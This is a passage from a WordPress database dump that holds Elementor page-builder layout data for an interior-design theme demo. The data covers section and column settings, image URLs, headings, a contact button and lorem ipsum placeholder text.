\\n\",\"numerical_order\":\"01\",\"top_order\":{\"unit\":\"px\",\"size\":-24,\"sizes\":[]},\"right_order\":{\"unit\":\"px\",\"size\":-80,\"sizes\":[]},\"_element_width_mobile\":\"auto\",\"bottom_mobile\":{\"unit\":\"px\",\"size\":175,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"retirio_elementor_ova_icon_box_2\"}],\"isInner\":true},{\"id\":\"b9984a7\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null,\"animation\":\"fadeInDown\",\"animation_tablet\":\"none\",\"background_background\":\"classic\",\"background_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/line-2.png\",\"id\":3839,\"alt\":\"\",\"source\":\"library\"},\"background_position\":\"initial\",\"background_xpos\":{\"unit\":\"px\",\"size\":45,\"sizes\":[]},\"background_xpos_tablet\":{\"unit\":\"px\",\"size\":45,\"sizes\":[]},\"background_xpos_mobile\":{\"unit\":\"%\",\"size\":-1000,\"sizes\":[]},\"background_ypos\":{\"unit\":\"px\",\"size\":135,\"sizes\":[]},\"background_ypos_tablet\":{\"unit\":\"px\",\"size\":140,\"sizes\":[]},\"background_ypos_mobile\":{\"unit\":\"%\",\"size\":-1000,\"sizes\":[]},\"background_repeat\":\"no-repeat\",\"padding\":{\"unit\":\"px\",\"top\":\"55\",\"right\":\"0\",\"bottom\":\"65\",\"left\":\"0\",\"isLinked\":false},\"_inline_size_tablet\":50,\"align_tablet\":\"center\",\"margin_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"30\",\"left\":\"0\",\"isLinked\":false},\"content_position_tablet\":\"bottom\",\"background_position_tablet\":\"initial\",\"margin_mobile\":{\"unit\":\"px\",\"top\":\"120\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"60\",\"right\":\"0\",\"bottom\":\"60\",\"left\":\"0\",\"isLinked\":false},\"padding_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"animation_delay\":250},\"elements\":[{\"id\":\"aba257a\",\"elType\":\"widget\",\"settings\":{\"icon\":{\"value\":\"flaticon flaticon-interior-design\",\"library\":\"flaticon\"},\"text\":\"Design\\nschematic \\n\",\"numerical_order\":\"02\",\"text_position\":\"top-left\",\"_element_width_mobile\":\"auto\"},\"elements\":[],\"widgetType\":\"retirio_elementor_ova_icon_box_2\"}],\"isInner\":true},{\"id\":\"24d2339\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null,\"margin_mobile\":{\"unit\":\"px\",\"top\":\"60\",\"right\":\"0\",\"bottom\":\"60\",\"left\":\"0\",\"isLinked\":false},\"animation\":\"fadeInDown\",\"animation_tablet\":\"none\",\"background_background\":\"classic\",\"background_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/line-1.png\",\"id\":3838,\"alt\":\"\",\"source\":\"library\"},\"background_position\":\"initial\",\"background_xpos\":{\"unit\":\"px\",\"size\":57,\"sizes\":[]},\"background_repeat\":\"no-repeat\",\"padding\":{\"unit\":\"px\",\"top\":\"65\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_inline_size_tablet\":50,\"align_tablet\":\"center\",\"background_position_tablet\":\"initial\",\"background_xpos_tablet\":{\"unit\":\"px\",\"size\":60,\"sizes\":[]},\"margin_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"30\",\"left\":\"0\",\"isLinked\":false},\"content_position_tablet\":\"top\",\"background_xpos_mobile\":{\"unit\":\"%\",\"size\":-1000,\"sizes\":[]},\"background_ypos_mobile\":{\"unit\":\"%\",\"size\":-1000,\"sizes\":[]},\"animation_delay\":500},\"elements\":[{\"id\":\"0f2ef7d\",\"elType\":\"widget\",\"settings\":{\"icon\":{\"value\":\"flaticon flaticon-development\",\"library\":\"flaticon\"},\"text\":\"Design\\ndevelopment\",\"numerical_order\":\"03\",\"top_order\":{\"unit\":\"px\",\"size\":-27,\"sizes\":[]},\"_element_width_mobile\":\"auto\",\"bottom_mobile\":{\"unit\":\"px\",\"size\":175,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"retirio_elementor_ova_icon_box_2\"}],\"isInner\":true},{\"id\":\"d6ce61d\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null,\"animation\":\"fadeInDown\",\"animation_tablet\":\"none\",\"_inline_size_tablet\":50,\"content_position_tablet\":\"bottom\",\"align_tablet\":\"center\",\"background_background\":\"classic\",\"background_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/line-2.png\",\"id\":3839,\"alt\":\"\",\"source\":\"library\"},\"background_position\":\"initial\",\"background_position_tablet\":\"initial\",\"background_xpos\":{\"unit\":\"px\",\"size\":45,\"sizes\":[]},\"background_xpos_tablet\":{\"unit\":\"px\",\"size\":45,\"sizes\":[]},\"background_xpos_mobile\":{\"unit\":\"%\",\"size\":-100,\"sizes\":[]},\"background_ypos\":{\"unit\":\"px\",\"size\":135,\"sizes\":[]},\"background_ypos_tablet\":{\"unit\":\"px\",\"size\":140,\"sizes\":[]},\"background_ypos_mobile\":{\"unit\":\"%\",\"size\":-100,\"sizes\":[]},\"background_repeat\":\"no-repeat\",\"padding\":{\"unit\":\"px\",\"top\":\"55\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"60\",\"right\":\"0\",\"bottom\":\"60\",\"left\":\"0\",\"isLinked\":false},\"margin_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"30\",\"left\":\"0\",\"isLinked\":false},\"margin_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"padding_mobile\":{\"unit\":\"px\",\"top\":\"60\",\"right\":\"0\",\"bottom\":\"30\",\"left\":\"0\",\"isLinked\":false},\"animation_delay\":750},\"elements\":[{\"id\":\"020e37a\",\"elType\":\"widget\",\"settings\":{\"icon\":{\"value\":\"flaticon flaticon-construction\",\"library\":\"flaticon\"},\"text\":\"Construction\\ndevelopment\",\"numerical_order\":\"04\",\"text_position\":\"top-left\",\"_element_width_mobile\":\"auto\"},\"elements\":[],\"widgetType\":\"retirio_elementor_ova_icon_box_2\"}],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false},{\"id\":\"cbd0171\",\"elType\":\"section\",\"settings\":{\"structure\":\"60\",\"background_background\":\"classic\",\"background_color\":\"#242424\",\"padding\":{\"unit\":\"px\",\"top\":\"50\",\"right\":\"0\",\"bottom\":\"50\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"0137b13\",\"elType\":\"column\",\"settings\":{\"_column_size\":16,\"_inline_size\":17.178,\"_inline_size_tablet\":33,\"background_background\":\"classic\",\"background_image\":{\"url\":\"\",\"id\":\"\",\"alt\":\"\",\"source\":\"library\"},\"margin_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"30\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"5387f04\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/01-test.png\",\"id\":1901,\"alt\":\"\",\"source\":\"library\"},\"align\":\"left\",\"align_tablet\":\"center\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"0238cd9\",\"elType\":\"column\",\"settings\":{\"_column_size\":16,\"_inline_size\":16.427,\"_inline_size_tablet\":33,\"margin_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"30\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"2140ada\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/02-home1.png\",\"id\":1903,\"alt\":\"\",\"source\":\"library\"},\"align\":\"left\",\"align_tablet\":\"center\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"22014c4\",\"elType\":\"column\",\"settings\":{\"_column_size\":16,\"_inline_size\":15.06,\"_inline_size_tablet\":33,\"margin_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"30\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"812d896\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/03-home1.png\",\"id\":1904,\"alt\":\"\",\"source\":\"library\"},\"align\":\"left\",\"align_tablet\":\"center\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"282c361\",\"elType\":\"column\",\"settings\":{\"_column_size\":16,\"_inline_size\":13.587,\"_inline_size_tablet\":33,\"margin_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"30\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"7e86368\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/04-home1.png\",\"id\":1905,\"alt\":\"\",\"source\":\"library\"},\"align\":\"right\",\"align_tablet\":\"center\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"44b0fc9\",\"elType\":\"column\",\"settings\":{\"_column_size\":16,\"_inline_size\":17.368,\"_inline_size_tablet\":33,\"margin_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"30\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"78697fd\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/05-home1.png\",\"id\":1906,\"alt\":\"\",\"source\":\"library\"},\"align\":\"right\",\"align_tablet\":\"center\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"861133d\",\"elType\":\"column\",\"settings\":{\"_column_size\":16,\"_inline_size\":18.375,\"_inline_size_tablet\":33},\"elements\":[{\"id\":\"10e265f\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/06-home1.png\",\"id\":1907,\"alt\":\"\",\"source\":\"library\"},\"align\":\"right\",\"align_tablet\":\"center\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"9e0e567\",\"elType\":\"section\",\"settings\":{\"margin\":{\"unit\":\"px\",\"top\":\"107\",\"right\":0,\"bottom\":\"80\",\"left\":0,\"isLinked\":false},\"margin_tablet\":{\"unit\":\"px\",\"top\":\"67\",\"right\":0,\"bottom\":\"50\",\"left\":0,\"isLinked\":false}},\"elements\":[{\"id\":\"5ed1170\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"bb1865f\",\"elType\":\"widget\",\"settings\":{\"sub_title\":\"Direct from the blog posts\",\"title\":\"\\nCheckout our latest news\\nand articles\",\"content_typography_title_typography\":\"custom\",\"content_typography_title_font_size\":{\"unit\":\"px\",\"size\":50,\"sizes\":[]},\"content_typography_title_font_weight\":\"800\",\"content_typography_sub_title_typography\":\"custom\",\"content_typography_sub_title_font_size\":{\"unit\":\"px\",\"size\":16,\"sizes\":[]},\"content_typography_sub_title_font_weight\":\"600\",\"content_typography_sub_title_letter_spacing\":{\"unit\":\"px\",\"size\":2.2,\"sizes\":[]},\"_padding\":{\"unit\":\"%\",\"top\":\"0\",\"right\":\"20\",\"bottom\":\"0\",\"left\":\"20\",\"isLinked\":false},\"_padding_tablet\":{\"unit\":\"%\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_padding_mobile\":{\"unit\":\"%\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"retirio_elementor_heading\"},{\"id\":\"25f2c71\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"retirio_elementor_blog_grid_2\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"7a90e77\",\"elType\":\"section\",\"settings\":{\"structure\":\"22\",\"gap\":\"no\",\"background_background\":\"classic\",\"background_color\":\"#E3B25A\",\"background_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/background-get-interior.png\",\"id\":1896,\"alt\":\"\",\"source\":\"library\"},\"background_position\":\"initial\",\"background_xpos\":{\"unit\":\"px\",\"size\":1,\"sizes\":[]},\"background_xpos_tablet\":{\"unit\":\"%\",\"size\":0,\"sizes\":[]},\"background_xpos_mobile\":{\"unit\":\"%\",\"size\":0,\"sizes\":[]},\"background_ypos\":{\"unit\":\"%\",\"size\":80,\"sizes\":[]},\"background_ypos_tablet\":{\"unit\":\"%\",\"size\":0,\"sizes\":[]},\"background_ypos_mobile\":{\"unit\":\"%\",\"size\":0,\"sizes\":[]},\"background_repeat\":\"no-repeat\",\"padding\":{\"unit\":\"px\",\"top\":\"80\",\"right\":\"0\",\"bottom\":\"80\",\"left\":\"0\",\"isLinked\":false},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"80\",\"right\":\"10\",\"bottom\":\"80\",\"left\":\"10\",\"isLinked\":false}},\"elements\":[{\"id\":\"f4bedba\",\"elType\":\"column\",\"settings\":{\"_column_size\":66,\"_inline_size\":null,\"margin_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"30\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"4440af1\",\"elType\":\"widget\",\"settings\":{\"sub_title\":\"Hire us for your new projects\",\"title\":\"Get interior designs right now\",\"align_heading\":\"left\",\"content_typography_title_typography\":\"custom\",\"content_typography_title_font_size\":{\"unit\":\"px\",\"size\":40,\"sizes\":[]},\"content_typography_title_font_weight\":\"800\",\"color_title\":\"#FFFFFF\",\"margin_title\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"content_typography_sub_title_typography\":\"custom\",\"content_typography_sub_title_font_size\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"content_typography_sub_title_font_weight\":\"400\",\"content_typography_sub_title_text_transform\":\"none\",\"color_sub_title\":\"#FFFFFF\"},\"elements\":[],\"widgetType\":\"retirio_elementor_heading\"}],\"isInner\":false},{\"id\":\"e99860c\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"content_position\":\"center\",\"align\":\"center\",\"align_mobile\":\"flex-start\"},\"elements\":[{\"id\":\"8cfb32b\",\"elType\":\"widget\",\"settings\":{\"text\":\"contact with us\",\"typography_typography\":\"custom\",\"typography_text_transform\":\"uppercase\",\"background_color\":\"#242424\",\"hover_color\":\"#E3B25A\",\"text_padding\":{\"unit\":\"px\",\"top\":\"18\",\"right\":\"40\",\"bottom\":\"18\",\"left\":\"40\",\"isLinked\":false},\"button_bg_hover\":\"#FFFFFF\",\"button_before_width\":{\"unit\":\"px\",\"size\":8,\"sizes\":[]},\"button_before_height\":{\"unit\":\"px\",\"size\":8,\"sizes\":[]},\"_element_width\":\"auto\",\"_element_vertical_align\":\"center\",\"link\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/contact\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]},\"typography_font_weight\":\"800\",\"border_radius\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false}]'),(3233,4768,'_elementor_page_assets','a:1:{s:6:\"styles\";a:15:{i:0;s:12:\"e-animations\";i:1;s:12:\"e-animations\";i:2;s:12:\"e-animations\";i:3;s:12:\"e-animations\";i:4;s:12:\"e-animations\";i:5;s:12:\"e-animations\";i:6;s:12:\"e-animations\";i:7;s:12:\"e-animations\";i:8;s:12:\"e-animations\";i:9;s:12:\"e-animations\";i:10;s:12:\"e-animations\";i:11;s:12:\"e-animations\";i:12;s:12:\"e-animations\";i:13;s:12:\"e-animations\";i:14;s:12:\"e-animations\";}}'),(3234,4768,'_elementor_pro_version','3.8.1'),(3235,4769,'_wp_page_template','elementor_header_footer'),(3236,4769,'_elementor_edit_mode','builder'),(3237,4769,'_elementor_template_type','wp-page'),(3238,4769,'_elementor_version','3.8.1'),(3239,4769,'_elementor_data','[{\"id\":\"98d9991\",\"elType\":\"section\",\"settings\":{\"layout\":\"full_width\",\"gap\":\"no\",\"margin\":{\"unit\":\"px\",\"top\":\"-142\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false},\"background_background\":\"classic\",\"background_color\":\"#242424\"},\"elements\":[{\"id\":\"623fbca\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"911d45f\",\"elType\":\"widget\",\"settings\":{\"revslidertitle\":\"Home 1\",\"shortcode\":\"[rev_slider alias=\\\"home-1\\\" slidertitle=\\\"Home 1\\\"][\\/rev_slider]\"},\"elements\":[],\"widgetType\":\"slider_revolution\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"8a4764c\",\"elType\":\"section\",\"settings\":{\"custom_height\":{\"unit\":\"px\",\"size\":500,\"sizes\":[]},\"overflow\":\"hidden\",\"structure\":\"20\",\"background_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/aboutbg.png\",\"id\":2075,\"alt\":\"\",\"source\":\"library\"},\"background_position\":\"bottom right\",\"background_repeat\":\"no-repeat\",\"background_size\":\"auto\",\"margin\":{\"unit\":\"px\",\"top\":\"110\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false},\"margin_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"140\",\"left\":\"0\",\"isLinked\":false},\"background_overlay_background\":\"classic\",\"background_overlay_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/aboutbg.png\",\"id\":2075,\"alt\":\"\",\"source\":\"library\"},\"background_overlay_position\":\"bottom right\",\"background_overlay_repeat\":\"no-repeat\",\"background_overlay_opacity\":{\"unit\":\"px\",\"size\":0.7,\"sizes\":[]},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"10\",\"bottom\":\"90\",\"left\":\"0\",\"isLinked\":false},\"padding_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"10\",\"bottom\":\"0\",\"left\":\"10\",\"isLinked\":false},\"gap\":\"no\"},\"elements\":[{\"id\":\"50ec226\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null,\"_inline_size_tablet\":100,\"content_position\":\"top\",\"align\":\"flex-end\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"40\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"margin_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true},\"margin_mobile\":{\"unit\":\"px\",\"top\":\"80\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"001316b\",\"elType\":\"widget\",\"settings\":{\"mask_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/mask-img-01.svg\",\"id\":2954,\"alt\":\"\",\"source\":\"library\"},\"image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/decor-home-1-about-interior.jpg\",\"id\":4387,\"alt\":\"\",\"source\":\"library\"},\"image_width\":{\"unit\":\"px\",\"size\":470,\"sizes\":[]},\"image_height\":{\"unit\":\"px\",\"size\":520,\"sizes\":[]},\"image_alignment\":\"right\",\"image_alignment_tablet\":\"center\",\"_animation\":\"fadeInRight\",\"_animation_tablet\":\"none\",\"text_left\":\"ARCHITECT\",\"image_width_template1_type1\":{\"unit\":\"px\",\"size\":470,\"sizes\":[]},\"_element_width\":\"auto\"},\"elements\":[],\"widgetType\":\"retirio_elementor_image\"},{\"id\":\"b2ff890\",\"elType\":\"widget\",\"settings\":{\"mask_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/mask-img-02.svg\",\"id\":2955,\"alt\":\"\",\"source\":\"library\"},\"image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/Philip-Johnson.jpg\",\"id\":1161,\"alt\":\"\",\"source\":\"library\"},\"image_width\":{\"unit\":\"px\",\"size\":470,\"sizes\":[]},\"image_height\":{\"unit\":\"px\",\"size\":520,\"sizes\":[]},\"image_display\":\"inline-flex\",\"_position\":\"absolute\",\"_offset_x\":{\"unit\":\"px\",\"size\":-53,\"sizes\":[]},\"_offset_y\":{\"unit\":\"px\",\"size\":-148,\"sizes\":[]},\"_offset_x_tablet\":{\"unit\":\"px\",\"size\":10,\"sizes\":[]},\"_offset_x_end_tablet\":{\"unit\":\"px\",\"size\":-10,\"sizes\":[]},\"_animation\":\"fadeInLeft\",\"_animation_tablet\":\"none\",\"text_left\":\"ARCHITECT\",\"_offset_x_end_mobile\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"_transform_rotateZ_effect_hover\":{\"unit\":\"px\",\"size\":360,\"sizes\":[]},\"_transform_rotateX_effect_hover\":{\"unit\":\"px\",\"size\":14,\"sizes\":[]},\"_transform_translateX_effect_hover\":{\"unit\":\"px\",\"size\":-200,\"sizes\":[]},\"_transform_scale_effect_hover\":{\"unit\":\"px\",\"size\":2,\"sizes\":[]},\"_transform_transition_hover\":{\"unit\":\"px\",\"size\":1000,\"sizes\":[]},\"template_type\":\"type2\",\"image_width_template1_type2_no_border\":{\"unit\":\"px\",\"size\":470,\"sizes\":[]},\"_element_width\":\"inherit\",\"_offset_x_end\":{\"unit\":\"px\",\"size\":-0.2,\"sizes\":[]},\"_element_width_mobile\":\"inherit\",\"_offset_x_mobile\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"_offset_y_mobile\":{\"unit\":\"px\",\"size\":-147,\"sizes\":[]},\"_offset_orientation_v\":\"end\",\"_offset_y_end\":{\"unit\":\"px\",\"size\":-100,\"sizes\":[]},\"_offset_y_end_tablet\":{\"unit\":\"px\",\"size\":-167,\"sizes\":[]},\"_offset_y_end_mobile\":{\"unit\":\"px\",\"size\":-131,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"retirio_elementor_image\"},{\"id\":\"0584a9d\",\"elType\":\"widget\",\"settings\":{\"mask_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/mask-img-02.svg\",\"id\":2955,\"alt\":\"\",\"source\":\"library\"},\"image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/pexels-lina-kivaka-1841143.jpg\",\"id\":2991,\"alt\":\"\",\"source\":\"library\"},\"image_width_template_2\":{\"unit\":\"px\",\"size\":170,\"sizes\":[]},\"image_height_template_2\":{\"unit\":\"px\",\"size\":170,\"sizes\":[]},\"image_border\":{\"unit\":\"px\",\"size\":7,\"sizes\":[]},\"border_color\":\"#FFFFFF\",\"text_left\":\"ARCHITECT\",\"_element_width\":\"auto\",\"_position\":\"absolute\",\"_offset_x\":{\"unit\":\"px\",\"size\":13,\"sizes\":[]},\"_offset_x_mobile\":{\"unit\":\"px\",\"size\":10,\"sizes\":[]},\"_offset_orientation_v\":\"end\",\"_offset_y_end\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"_animation\":\"fadeInUp\",\"_animation_tablet\":\"none\",\"_animation_delay\":200,\"template_type\":\"type2\",\"show_border\":\"yes\",\"image_width_template1_type2_mobile\":{\"unit\":\"px\",\"size\":130,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"retirio_elementor_image\"},{\"id\":\"60b9817\",\"elType\":\"widget\",\"settings\":{\"mask_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/mask-img-02.svg\",\"id\":2955,\"alt\":\"\",\"source\":\"library\"},\"image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/armin-djuhic-mcL2f-J74GY-unsplash.jpg\",\"id\":2996,\"alt\":\"\",\"source\":\"library\"},\"image_width_template_2\":{\"unit\":\"px\",\"size\":170,\"sizes\":[]},\"image_height_template_2\":{\"unit\":\"px\",\"size\":170,\"sizes\":[]},\"image_border\":{\"unit\":\"px\",\"size\":7,\"sizes\":[]},\"border_color\":\"#FFFFFF\",\"text_left\":\"ARCHITECT\",\"_element_width\":\"auto\",\"_position\":\"absolute\",\"_offset_x\":{\"unit\":\"px\",\"size\":115,\"sizes\":[]},\"_offset_x_mobile\":{\"unit\":\"px\",\"size\":77,\"sizes\":[]},\"_offset_orientation_v\":\"end\",\"_offset_y_end\":{\"unit\":\"px\",\"size\":-20,\"sizes\":[]},\"_offset_y_end_mobile\":{\"unit\":\"px\",\"size\":-5,\"sizes\":[]},\"_animation\":\"fadeInUp\",\"_animation_tablet\":\"none\",\"_animation_delay\":400,\"template_type\":\"type2\",\"show_border\":\"yes\",\"image_width_template1_type2_mobile\":{\"unit\":\"px\",\"size\":130,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"retirio_elementor_image\"},{\"id\":\"79c1a30\",\"elType\":\"widget\",\"settings\":{\"mask_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/mask-img-02.svg\",\"id\":2955,\"alt\":\"\",\"source\":\"library\"},\"image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/minh-pham-OtXADkUh3-I-unsplash.jpg\",\"id\":3001,\"alt\":\"\",\"source\":\"library\"},\"image_width_template_2\":{\"unit\":\"px\",\"size\":170,\"sizes\":[]},\"image_height_template_2\":{\"unit\":\"px\",\"size\":170,\"sizes\":[]},\"image_border\":{\"unit\":\"px\",\"size\":7,\"sizes\":[]},\"border_color\":\"#FFFFFF\",\"text_left\":\"ARCHITECT\",\"_element_width\":\"auto\",\"_position\":\"absolute\",\"_offset_x\":{\"unit\":\"px\",\"size\":216,\"sizes\":[]},\"_offset_x_mobile\":{\"unit\":\"px\",\"size\":135,\"sizes\":[]},\"_offset_x_end\":{\"unit\":\"px\",\"size\":80,\"sizes\":[]},\"_offset_orientation_v\":\"end\",\"_offset_y_end\":{\"unit\":\"px\",\"size\":-59,\"sizes\":[]},\"_animation\":\"fadeInUp\",\"_animation_tablet\":\"none\",\"_animation_delay\":400,\"template_type\":\"type2\",\"show_border\":\"yes\",\"image_width_template1_type2_mobile\":{\"unit\":\"px\",\"size\":130,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"retirio_elementor_image\"}],\"isInner\":false},{\"id\":\"05b98db\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null,\"_inline_size_tablet\":100,\"margin\":{\"unit\":\"px\",\"top\":\"60\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"margin_tablet\":{\"unit\":\"px\",\"top\":\"80\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"animation\":\"slideInRight\",\"animation_tablet\":\"none\",\"animation_duration\":\"slow\",\"animation_delay\":100,\"padding_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"10\",\"bottom\":\"0\",\"left\":\"10\",\"isLinked\":false}},\"elements\":[{\"id\":\"2659e25\",\"elType\":\"widget\",\"settings\":{\"sub_title\":\"ABOUT US\",\"title\":\"LOREM IPSUM\",\"align_heading\":\"left\",\"margin_title\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"23\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"retirio_elementor_heading\"},{\"id\":\"d5a8088\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><span style=\\\"font-weight: 400;\\\">LOREM 